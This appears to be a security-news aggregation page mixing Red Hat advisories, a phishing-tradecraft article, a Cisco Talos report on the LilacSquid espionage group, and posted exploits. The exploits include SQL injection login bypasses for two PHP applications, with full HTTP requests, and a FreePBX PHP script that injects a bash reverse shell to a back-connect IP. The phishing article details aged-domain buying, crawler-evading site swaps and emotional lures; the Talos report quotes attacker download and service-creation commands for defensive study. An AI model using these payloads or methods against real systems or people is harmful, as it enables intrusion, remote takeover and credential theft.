Employee and Visitor Gate Pass Logging System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Employee and Visitor Gate Pass Logging System - SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Furkan Eren Tetik# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Employee and Visitor Gate Pass Logging System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.Steps To Reproduce:1 - Go to the login page http://localhost/employee_gatepass/admin/login.php2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.3 - Click on "Login" button and you are logged in as administrator.PoCRequestPOST /employee_gatepass/classes/Login.php?f=login HTTP/1.1Host: localhostContent-Length: 43sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/employee_gatepass/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479iConnection: closeusername=admin'+or+'1'%3D'1&password=furkan--------------------------------------------------------------------------------------------------------------------------------responseHTTP/1.1 200 OKDate: Wed, 29 May 2024 17:01:26 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30X-Powered-By: PHP/8.0.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 20Connection: closeContent-Type: text/html; charset=UTF-8{"status":"success"}

Employee And Visitor Gate Pass Logging System 1.0 SQL Injection

FreePBX suffers from a remote code execution vulnerability. Versions 14, 15, and 16 are all affected.

    # Exploit Title: FreePBX 16 -  Remote Code Execution (RCE) (Authenticated)# Exploit Author: Cold z3ro# Date: 6/1/2024# Tested on: 14,15,16# Vendor: https://www.freepbx.org/<?php////// FREEPBX [14,15,16] API Module Authenticated RCE /// Orginal Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI/// Cod[3]d by Cold z3ro ///$url = "10.10.10.186"; // remote host$backconnectip = "192.168.0.2";$port = "4444"; $PHPSESSID = "any valid session even extension";  echo "checking $url\n";  $url = trim($url);  $ch = curl_init();  curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs');  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);  curl_setopt($ch, CURLOPT_TIMEOUT, 2);  curl_setopt($ch, CURLOPT_HTTPHEADER, [    'Referer: http://'.$url.'/admin/config.php?display=api',    'Content-Type: application/x-www-form-urlencoded',  ]);  curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID);  curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)');  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  echo $response = curl_exec($ch)."\n";  curl_close($ch);?>

FreePBX 16 Remote Code Execution

Red Hat Security Advisory 2024-3527-03 - Red Hat AMQ Streams 2.7.0 is now available from the Red Hat Customer Portal. Issues addressed include buffer overflow, denial of service, integer overflow, memory leak, and resource exhaustion vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3527.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat AMQ Streams 2.7.0 release and security update  
Advisory ID:        RHSA-2024:3527-03  
Product:            Red Hat AMQ Streams  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3527  
Issue date:         2024-05-31  
Revision:           03  
CVE Names:          CVE-2021-3520  
====================================================================

Summary: 

Red Hat AMQ Streams 2.7.0 is now available from the Red Hat Customer Portal.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. 

This release of Red Hat AMQ Streams 2.7.0 serves as a replacement for Red Hat AMQ Streams 2.7.0, and includes security and bug fixes, and enhancements.

Security Fix(es):

* lz4: memory corruption due to an integer overflow bug caused by memmove argument  (CVE-2021-3520)  
* zstd: Race condition allows attacker to access world-readable destination file (CVE-2021-24032)  
* RocksDB: zstd: mysql: buffer overrun in util.c  (CVE-2022-4899)  
* netty-codec-http: Allocation of Resources Without Limits or Throttling  (CVE-2024-29025)  
* commons-compress: Denial of service caused by an infinite loop for a corrupted DUMP file (CVE-2024-25710)  
* apache-commons-text: variable interpolation RCE (CVE-2022-42889)  
* snappy-java: Missing upper bound check on chunk length in snappy-java can lead to Denial of Service (DoS) impact  (CVE-2023-43642)  
* json-smart: Uncontrolled Resource Consumption vulnerability in json-smart (Resource Exhaustion)  (CVE-2023-1370)  
*  protobuf-java: timeout in parser leads to DoS (CVE-2022-3171)  
* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing  (CVE-2022-42920)  
* bc-java: Out of memory while parsing ASN.1 crafted data in org.bouncycastle.openssl.PEMParser class  (CVE-2023-33202)  
* bouncycastle: potential blind LDAP injection attack using a self-signed certificate  (CVE-2023-33201)  
* json-path: stack-based buffer overflow in Criteria.parse method  (CVE-2023-51074)  
* guava: insecure temporary directory creation  (CVE-2023-2976)  
* io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support (CVE-2024-1300)  
* io.vertx/vertx-core: memory leak due to the use of Netty FastThreadLocal data structures in Vertx (CVE-2024-1023)  
* quarkus-core: Leak of local configuration properties into Quarkus applications  (CVE-2024-2700)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-3520

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=1928090  
https://bugzilla.redhat.com/show_bug.cgi?id=1954559  
https://bugzilla.redhat.com/show_bug.cgi?id=2135435  
https://bugzilla.redhat.com/show_bug.cgi?id=2137645  
https://bugzilla.redhat.com/show_bug.cgi?id=2142707  
https://bugzilla.redhat.com/show_bug.cgi?id=2179864  
https://bugzilla.redhat.com/show_bug.cgi?id=2188542  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2215465  
https://bugzilla.redhat.com/show_bug.cgi?id=2241722  
https://bugzilla.redhat.com/show_bug.cgi?id=2251281  
https://bugzilla.redhat.com/show_bug.cgi?id=2256063  
https://bugzilla.redhat.com/show_bug.cgi?id=2260840  
https://bugzilla.redhat.com/show_bug.cgi?id=2263139  
https://bugzilla.redhat.com/show_bug.cgi?id=2264988  
https://bugzilla.redhat.com/show_bug.cgi?id=2272907  
https://bugzilla.redhat.com/show_bug.cgi?id=2273281  
https://issues.redhat.com/browse/ENTMQST-5619  
https://issues.redhat.com/browse/ENTMQST-5881  
https://issues.redhat.com/browse/ENTMQST-5882  
https://issues.redhat.com/browse/ENTMQST-5883  
https://issues.redhat.com/browse/ENTMQST-5884  
https://issues.redhat.com/browse/ENTMQST-5885  
https://issues.redhat.com/browse/ENTMQST-5886

Red Hat Security Advisory 2024-3527-03

Online Payment Hub System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Online Payment Hub System - SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Hamit Avşar# Vendor Homepage: https://www.sourcecodester.com/php/15018/online-payment-hub-using-php-and-paypal-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.Steps To Reproduce:1 - Go to the login page http://localhost/oph/admin/login.php2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.3 - Click on "Login" button and you are logged in as administrator.PoCRequestPOST /oph/classes/Login.php?f=login HTTP/1.1Host: localhostContent-Length: 42sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/oph/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479iConnection: closeusername=admin'+or+'1'%3D'1&password=hamit--------------------------------------------------------------------------------------------------------------------------------responseHTTP/1.1 200 OKDate: Wed, 29 May 2024 17:15:28 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30X-Powered-By: PHP/8.0.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 20Connection: closeContent-Type: text/html; charset=UTF-8{"status":"success"}

Online Payment Hub System 1.0 SQL Injection

By Daily Contributors
One of the interesting things about working for a cybersecurity company is that you get to talk to…
This is a post from HackRead.com Read the original post: One Phish, Two Phish, Red Phish, Blue Phish

One of the interesting things about working for a cybersecurity company is that you get to talk to people who, if it weren’t for their ethics, would have the perfect skill set and tool chest to make for great black hat hackers. And so yesterday, I sat down for a chat with George Skouroupathis, our phishing expert at Resonance Security.

In this article, I look at how phishing attacks work at a deeper level than just the “don’t click on suspicious links in random emails that you get.”

Some of you may be wondering, “Aren’t you just providing a blueprint for phishing attackers?”

No — they already know how to scam you. This article is the equivalent of demonstrating how a “find the queen” street con works. Just telling you not to engage does not provide the underlying education required to fully understand and hence avoid being taken advantage of.

So, let’s dive in and swim among the phishes.

****What exactly is phishing?****

Phishing is a security attack in which a malicious entity pretends to be a legitimate entity to trick people into handing over sensitive information: passwords, credit card numbers, or other personal data, that can subsequently be used to hack into computer systems, engage in identity theft, and a whole load of other nefarious activities.

Phishing is often the first step taken by hackers in a larger scam.

The name is a bit odd — a misspelling of “fishing”, as in “fishing for information”, with the “ph” probably taken from an earlier hacking term, “phreaking”, which is a shortened term for “phone hacking.” This term appeared back when hackers messed about with homemade hardware to subvert the landline phone system to make free long-distance calls; such phone hackers were calling “phreakers”.

There are lots of different kinds of phishing attacks, but one of the most prevalent is spear phishing, in which the hacker produces spoof emails that look like they are company official, for example from someone in the HR department, or a client or partner of the company.

The aim is to get company employees to click on malicious links that encourage them to enter confidential information or open email attachments that contain malware as a way past the company’s defenses.

****How does phishing work?****

Although I already knew the basics of phishing: don’t click on links in suspicious emails, George talked me through some of the subtle tricks hackers use to get past phishing defenses that email servers now have in place, and the education that time and experience provide employees with to detect potential phishing attacks.

Phishing is a cat-and-mouse game in which new techniques are developed by hackers all the time, and the security systems and our security education have to evolve to deal with them.

There are two main aspects to a successful phishing attack: the technical, and the psychological.

****The technical****

The main technical problem phishers face is getting past modern-day spam filters. Email clients and servers scan emails to detect content that may be harmful, and they even examine and follow web page links in making their decisions.

If a user gets a phishing email with a big red “this is suspicious” banner at the top or doesn’t even get to see the email because it’s moved straight into quarantine, then the phishing campaign is going to fail.

****Get a domain****

And so, phishers start by buying an old domain with a decent-looking history — a domain that was previously registered and subsequently allowed to lapse. This is like buying a fake identity based on a real person.

The domain is bought several months before the phishing campaign, registered with a known email provider such as Google Mail, Microsoft Outlook, or some other email service provider, and then used to send a few legitimate emails every day to build up a history on those mail servers to improve the sending reputation of the email addresses to be used.

Ideally, the domain should be relevant to the content of the phishing email.

****Build a site****

The phisher also builds a website before the campaign that looks legit:

*   uses SSL,
*   no broken links,
*   the HTTP headers make sense,
*   the main page has a redirect to a non-malicious first page, and
*   when a web crawler visits the site just“looks right”

One approach is to replicate the landing page of the client, or the website of a partner, client, or known service. Each website on the web is categorized by search engines, with categories such as health, management consultancy, technical services, media, and so on, and the aim is for the malicious website to fall squarely into one of the desirable categories that match the nature of the phishing campaign.

On the day that the phishing email is sent, the phisher will swap out the innocuous site for the malicious one. In some cases, a dynamic redirect page is used, so the first page is non-malicious when the spam scanner acts, but when someone from the target company follows the link they are led into the trap.

****Use marketing techniques****

When the phishing email is sent, phishers will often use tracking pixels to determine if and when the email is opened, which allows them to subsequently fine-tune further phishing email templates. Similarly, if the phishing link is clicked on is logged, the conversion rate for a malicious login page is, and other metrics are tracked.

Those of you in search engine optimization and marketing technical analytics will find this familiar because phishing uses all the known marketing techniques out there to improve the success rate in getting the target to: read the email, visit the site, and then “sign up”.

In this section, I’ve looked at email as the initial attack vector, but Facebook adverts, text messages, Telegram channels, and even Google calendar invites (defaulted to show the invite) can be used.

****The psychological****

I previously mentioned that technical marketing techniques are extremely useful for the phisher. That extends to building a target email list: the phisher will be checking social media, bulletin boards, and even the target company website for email addresses.

Or even buying them from a marketing services company that has gathered the required information in a list, for a few tens of dollars.

Another marketing technique that works is psychology — thinking about what would motivate the email recipients to click on the links. One way to achieve this is through emotions. When people are thinking emotionally, the rational part of their brain is turned down, and they are more likely to make a foolish mistake.

*   Greed, especially when combined with a fear of missing out. A time-limited offer of value puts pressure on the recipient to act now and regret it later.
*   Conformity and duty. For example, a request to complete a diversity training questionnaire, know-your-customer compliance process, or even, ironically, security training, can cause people to do what the email claims is required.
*   Pride. A fake award that looks significant or a spot as an expert on a well-known news program might just get the target to click on the link.

A further approach is to keep an eye on what is happening in public relations releases and the media in general concerning the company. If a senior director was recently arrested for insider trading, a phisher might send a link to what looks like a financial ethics survey. If the company is having a round of lay-offs, pushing an upskilling course in front of them could be the approach.

The trick used is to produce something so specifically aimed at the target’s interests that they end up with a gut feeling that no hacker would have bothered to make something so specifically relevant. That means considering who they are trying to trap, for example, the CEO’s assistant, or someone in the IT admin team.

****Conclusion****

Sometimes companies conduct internal phishing campaigns to train their employees in the risks, or if they are feeling particularly harsh, to identify individual weak links in the company. Unfortunately, not all such training exercises are handled with tact and an appreciation of the embarrassment falling for a phishing scam might cause the unwitting participants.

Hopefully, with the above insights into the minds of the phishers that I’ve provided, the chances of you being fooled are much lower now.

Let me know in the comments if you feel this has helped, and if you want to run an ethical and compassionate phishing training exercise for your organization.

Ilan Abitbo

As a Lead Security Engineer at Resonance Security, I play a pivotal role in shaping our cybersecurity landscape.

One Phish, Two Phish, Red Phish, Blue Phish

Red Hat Security Advisory 2024-3467-03 - An update for etcd is now available for Red Hat OpenStack Platform 16.1 on Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3467.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenStack Platform 16.1 (etcd) security update  
Advisory ID:        RHSA-2024:3467-03  
Product:            Red Hat OpenStack Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3467  
Issue date:         2024-05-30  
Revision:           03  
CVE Names:          CVE-2023-39318  
====================================================================

Summary: 

An update for etcd is now available for Red Hat OpenStack Platform 16.1  
(Train) on Red Hat Enterprise Linux (RHEL) 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

Description:

A highly-available key value store for shared configuration

Security Fix(es):

* Incomplete fix for CVE-2023-39325/CVE-2023-44487 in OpenStack Platform  
(CVE-2024-4438)

* Incomplete fix for CVE-2021-44716 in OpenStack Platform (CVE-2024-4437)

* Incomplete fix for CVE-2022-41723 in OpenStack Platform (CVE-2024-4436)

* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288)

* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)

* golang: crypto/tls: lack of a limit on buffered post-handshake (CVE-2023-39322)

* golang: crypto/tls: panic when processing post-handshake message on QUIC connections (CVE-2023-39321)

* golang: html/template: improper handling of special tags within script contexts (CVE-2023-39319)

* golang: html/template: improper handling of HTML-like comments within script contexts (CVE-2023-39318

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-39318

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2237773  
https://bugzilla.redhat.com/show_bug.cgi?id=2237776  
https://bugzilla.redhat.com/show_bug.cgi?id=2237777  
https://bugzilla.redhat.com/show_bug.cgi?id=2237778  
https://bugzilla.redhat.com/show_bug.cgi?id=2253330  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273  
https://bugzilla.redhat.com/show_bug.cgi?id=2279357  
https://bugzilla.redhat.com/show_bug.cgi?id=2279361  
https://bugzilla.redhat.com/show_bug.cgi?id=2279365

Red Hat Security Advisory 2024-3467-03

Multiple TTPs utilized in this campaign bear some overlap with North Korean APT groups.

Thursday, May 30, 2024 08:01

_By Anna Bennett, Nicole Hoffman, Asheer Malhotra, Sean Taylor and Brandon White._ 

*   Cisco Talos is disclosing a new suspected data theft campaign, active since at least 2021, we attribute to an advanced persistent threat actor (APT) we’re calling “LilacSquid.”  
*   LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources.  
*   This campaign uses MeshAgent, an open-source remote management tool, and a customized version of QuasarRAT we’re calling “PurpleInk” to serve as the primary implants after successfully compromising vulnerable application servers exposed to the internet.  
*   This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”  
*   The campaign is geared toward establishing long-term access to compromised victim organizations to enable LilacSquid to siphon data of interest to attacker-controlled servers. 

**LilacSquid – An espionage-motivated threat actor **

Talos assesses with high confidence that this campaign has been active since at least 2021 and the successful compromise and post-compromise activities are geared toward establishing long-term access for data theft by an advanced persistent threat (APT) actor we are tracking as "LilacSquid" and UAT-4820. Talos has observed at least three successful compromises spanning entities in Asia, Europe and the United States consisting of industry verticals such as pharmaceuticals, oil and gas, and technology. 

Previous intrusions into software manufacturers, such as the 3CX and X\_Trader compromises by Lazarus, indicate that unauthorized long-term access to organizations that manufacture and distribute popular software for enterprise and industrial organizations can open avenues of supply chain compromise proving advantageous to threat actors such as LilacSquid, allowing them to widen their net of targets.  

We have observed two different types of initial access techniques deployed by LilacSquid, including exploiting vulnerabilities and the use of compromised remote desktop protocol (RDP) credentials. Post-exploitation activity in this campaign consists of the deployment of MeshAgent, an open-source remote management and desktop session application, and a heavily customized version of QuasarRAT that we track as “PurpleInk” allowing LilacSquid to gain complete control over the infected systems. Additional means of persistence used by LilacSquid include the use of open-source tools such as Secure Socket Funneling (SSF), which is a tool for proxying and tunneling multiple sockets through a single secure TLS tunnel to a remote computer. 

It is worth noting that multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus. Public reporting has noted Andariel’s use of MeshAgent as a tool for maintaining post-compromise access after successful exploitation. Furthermore, Talos has observed Lazarus extensively use SOCKs proxy and tunneling tools, along with custom-made malware as part of their post-compromise playbooks to act as channels of secondary access and exfiltration. This tactic has also been seen in this campaign operated by LilacSquid where the threat actor deployed SSF along with other malware to create tunnels to their remote servers. 

**LilacSquid’s infection chains **

There are primarily two types of infection chains that LilacSquid uses in this campaign. The first involves the successful exploitation of a vulnerable web application, while the other is the use of compromised RDP credentials. Successful compromise of a system leads to LilacSquid deploying multiple vehicles of access onto compromised hosts, including dual-use tools such as MeshAgent, Secure Socket Funneling (SSF), InkLoader and PurpleInk. 

Successful exploitation of the vulnerable application results in the attackers deploying a script that will set up working directories for the malware and then download and execute MeshAgent from a remote server. On execution, MeshAgent will connect to its C2, carry out preliminary reconnaissance and begin downloading and activating other implants on the system, such as SSF and PurpleInk. 

MeshAgent is typically downloaded by the attackers using the bitsadmin utility and then executed to establish contact with the C2: 

bitsadmin /transfer -job\_name- /download /priority normal -remote\_URL- -local\_path\_for\_MeshAgent-  -local\_path\_for\_MeshAgent- connect 

**Instrumenting InkLoader – Modularizing the infection chain **

When compromised RDP credentials were used to gain access, the infection chain was altered slightly. LilacSquid chose to either deploy MeshAgent and subsequent implants, or introduce another component in the infection preceding PurpleInk.  

InkLoader is a simple, yet effective DOT NET-based malware loader. It is written to run a hardcoded executable or command. In this infection chain, InkLoader is the component that persists across reboots on the infected host instead of the actual malware it runs. So far, we have only seen PurpleInk being executed via InkLoader, but LilacSquid may likely use InkLoader to deploy additional malware implants. 

Talos observed LilacSquid deploy InkLoader in conjunction with PurpleInk only when they could successfully create and maintain remote sessions via remote desktop (RDP) by exploiting the use of stolen credentials to the target host. A successful login via RDP leads to the download of InkLoader and PurpleInk, copying these artifacts into desired directories on disk and the subsequent registration of InkLoader as a service that is then started to deploy InkLoader and, in turn, PurpleInk. The infection chain can be visualized as: 

Service creation and execution on the endpoint is typically done via the command line interface using the commands: 

sc create TransactExDetect displayname=Extended Transaction Detection binPath= \_filepath\_of\_InkLoader\_ start= auto 
sc description TransactExDetect Extended Transaction Detection for Active Directory domain hosts 
sc start TransactExDetect 

**PurpleInk – LilacSquid's bespoke implant **

PurpleInk, LilacSquid’s primary implant of choice, has been adapted from QuasarRAT, a popular remote access trojan family. Although QuasarRAT has been available to threat actors since at least 2014, we observed PurpleInk being actively developed starting in 2021 and continuing to evolve its functionalities separate from its parent malware family.  

PurpleInk uses an accompanying configuration file to obtain information such as the C2 server’s address and port. This file is typically base64-decoded and decrypted to obtain the configuration strings required by PurpleInk. 

PurpleInk is a highly versatile implant that is heavily obfuscated and contains a variety of RAT capabilities. Talos has observed multiple variants of PurpleInk where functionalities have both been introduced and removed. 

In terms of RAT capabilities, PurpleInk can perform the following actions on the infected host: 

*   Enumerate the process and send the process ID, name and associated Window Title to the C2. 
*   Terminate a process ID (PID) specified by the C2 on the infected host. 
*   Run a new application on the host – start process. 
*   Get drive information for the infected host, such as volume labels, root directory names, drive type and drive format. 
*   Enumerate a given directory to obtain underlying directory names, file names and file sizes. 
*   Read a file specified by the C2 and exfiltrate its contents. 
*   Replace or append content to a specified file. 

*   Gather system information about the infected host using WMI queries. Information includes:  

Information retrieved 

WMI query and output used 

Processor name 

SELECT \* FROM Win32\_Processor 

Memory (RAM) size in MB 

Select \* From Win32\_ComputerSystem | TotalPhysicalMemory 

Video Card (GPU) 

SELECT \* FROM Win32\_DisplayConfiguration | Description 

Username 

Current username 

Computer name 

Infected host’s name 

Domain name 

Domain of the infected host 

Host name 

NetBIOS Host name 

System drive 

Root system drive 

System directory 

System directory of the infected host 

Computer uptime 

Calculate uptime from current time and SELECT \* FROM Win32\_OperatingSystem WHERE Primary='true' | LastBootUpTime 

MAC address 

By enumerating Network interfaces on the endpoint 

LAN IP address 

By enumerating Network interfaces on the endpoint 

WAN IP address 

None – not retrieved or calculated – empty string sent to C2. 

Antivirus software name 

Not calculated – defaults to “NoInfo” 

Firewall 

Not calculated – defaults to “NoInfo” 

Time zone 

Not calculated – an empty string is sent to the C2. 

Country 

Not calculated – an empty string is sent to the C2. 

ISP 

Not calculated – an empty string is sent to the C2. 

*   Start a remote shell on the infected host using ‘ cmd\[.\]exe /K ’. 
*   Rename or move directories and files and then enumerate them. 
*   Delete files and directories specified by the C2. 
*   Connect to a specified remote address, specified by the C2. This remote address referenced as “Friend” internally is the reverse proxy host indicating that PurpleInk can act as an intermediate proxy tool. 

PurpleInk has the following capabilities related to communicating with its “friends” (proxy servers): 

*   Connect to a _new_ friend whose remote address is specified by the C2. 
*   Send data to a new or existing friend. 
*   Disconnect from a specified friend. 
*   Receive data from another connected friend and process it. 

Another PurpleInk variant, built and deployed in 2023 and 2024, consists of limited functionalities, with much of its capabilities stripped out. The capabilities that still reside in this variant are the abilities to: 

*   Close all connections to proxy servers. 
*   Create a reverse shell.  
*   Connect and send/receive data from connected proxies. 

Functionalities, such as file management, execution and gathering system information, have been stripped out of this variant of PurpleInk, but can be supplemented by the reverse shell carried over from previous variants, which can be used to carry out these tasks on the infected endpoint. Adversaries frequently strip, add and stitch together functionalities to reduce their implant’s footprint on the infected system to avoid detection or to improve their implementations to remove redundant capabilities.  

**InkBox – Custom loader observed in older attacks **

InkBox is a malware loader that will read from a hardcoded file path on disk and decrypt its contents. The decrypted content is another executable assembly that is then run by invoking its Entry Point within the InkBox process. This second assembly is the backdoor PurpleInk. The overall infection chain in this case is: 

The usage of InkBox to deploy PurpleInk is an older technique used by LilacSquid since 2021. Since 2023, the threat actor has produced another variant of the infection chain where they have modularized the infection chain so that PurpleInk can now run as a separate process. However, even in this new infection chain, PurpleInk is still run via another component that we call "InkLoader.”  

**LilacSquid employs MeshAgent **

In this campaign, LilacSquid has extensively used MeshAgent as the first stage of their post-compromise activity. MeshAgent is the agent/client from the MeshCentral, an open-source remote device management software. The MeshAgent binaries typically use a configuration file, known as an MSH file. The MSH files in this campaign contain information such as MeshName (victim identifier in this case) and C2 addresses: 

MeshName=-Name\_of\_mesh- 
MeshType=-Type\_of\_mesh- 
MeshID=0x-Mesh\_ID\_hex- 
ServerID=-Server\_ID\_hex- 
MeshServer=wss://-Mesh\_C2\_Address-
Translation=-keywords\_translation\_JSON-

Being a remote device management utility, MeshAgent allows an operator to control almost all aspects of the device via the MeshCentral server, providing capabilities such as: 

*   List all devices in the Mesh (list of victims). 
*   View and control desktop. 
*   Manage files on the system. 
*   View software and hardware information about the device.  

Post-exploitation, MeshAgent activates other dual-use and malicious tools on the infected systems, such as SSF and PurpleInk.  

**Coverage **

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.   

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

**IOCs**

IOCs for this research can also be found at our GitHub repository here. 

**PurpleInk **

2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8 

**Network IOCs **

67\[.\]213\[.\]221\[.\]6 

192\[.\]145\[.\]127\[.\]190 

45\[.\]9\[.\]251\[.\]14 

199\[.\]229\[.\]250\[.\]142

LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader

This Metasploit module exploits an unauthenticated command injection vulnerability in Progress Flowmon versions before v12.03.02.

